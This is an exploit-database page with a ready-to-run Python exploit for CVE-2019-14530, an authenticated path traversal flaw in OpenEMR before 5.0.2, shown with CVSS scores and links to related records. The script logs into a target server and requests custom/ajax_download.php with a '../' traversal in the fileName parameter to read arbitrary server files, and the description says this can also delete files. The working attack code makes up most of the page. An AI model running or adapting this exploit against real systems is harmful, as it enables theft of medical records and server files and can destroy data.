Lucene search
Ron Jost1337DAY-ID-36449HistoryJun 21, 2021 - 12:00 a.m.
OpenEMR 5.0.1.7 - (fileName) Path Traversal (Authenticated) Exploit
2021-06-2100:00:00
Ron Jost
0day.today
26
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
# Exploit Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated)
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
# Version: All versions prior to 5.0.2
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-14530
# CWE: CWE-22
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2019-14530-Exploit/README.md
# Reference: https://raw.githubusercontent.com/Wezery/CVE-2019-14530/master/Path%20traversal%20and%20DoS.pdf
'''
Description:
An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter.
An authenticated attacker can download any file (that is readable by the user www-data)
from server storage. If the requested file is writable for the www-data user and the directory
/var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.
'''
'''
Banner:
'''
banner = """
______ _______ ____ ___ _ ___ _ _ _ ____ _____ ___
/ ___\ \ / / ____| |___ \ / _ \/ |/ _ \ / | || || ___|___ / / _ \
| | \ \ / /| _| _____ __) | | | | | (_) |_____| | || ||___ \ |_ \| | | |
| |___ \ V / | |__|_____/ __/| |_| | |\__, |_____| |__ _|__) |__) | |_| |
\____| \_/ |_____| |_____|\___/|_| /_/ |_| |_||____/____/ \___/
by Hacker5preme
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='OpenEMR Path Traversal')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
openemr_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')
Filepath = input('[+] Filepath: ')
'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'new_login_session_management': '1',
'authProvider': 'Default',
'authUser': username,
'clearPass': password,
'languageChoice': '1'
}
# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
if 'error=1&site=' in auth.text:
print('[-] Authentication failed')
exit()
else:
print('[+] Authentication successfull: ' + str(auth))
'''
Path Traversal:
'''
url_static = 'http://' + target_ip + ':' + target_port + openemr_path
url_dynamic = '/custom/ajax_download.php?fileName=../../../../../../../../..'
url_exploit = url_static + url_dynamic + Filepath
print('')
print('[+] Constructed malicious URL: ')
# Headers:
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Exploit:
print('')
print('[+] Contents of ' + Filepath + ':')
print('')
getfile = session.get(url_exploit, headers = header)
print(getfile.text)
Related
githubexploit
githubexploit
Exploit for Path Traversal in Open-Emr Openemr
2021-06-30 08:59:57
Exploit for Path Traversal in Open-Emr Openemr
2019-08-13 01:33:11
exploitdb
exploitdb
attackerkb
attackerkb
CVE-2019-14530
2019-08-13 00:00:00
packetstorm
packetstorm
OpenEMR 5.0.1.7 Path Traversal
2021-06-18 00:00:00
OpenEMR 5.0.1.7 Path Traversal
2021-07-05 00:00:00
OpenEMR 5.0.1.3 Shell Upload
2021-07-13 00:00:00
osv
osv
CVE-2019-14530
2019-08-13 14:15:12
zdt
zdt
prion
prion
Design/Logic Flaw
2019-08-13 14:15:00
cve
cve
CVE-2019-14530
2019-08-13 14:15:00
nuclei
nuclei
OpenEMR <5.0.2 - Local File Inclusion
2022-08-27 05:16:12
openvas
openvas
OpenEMR < 5.0.2 Multiple Vulnerabilities
2019-08-06 00:00:00
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:S/C:P/I:N/A:N
Related for 1337DAY-ID-36449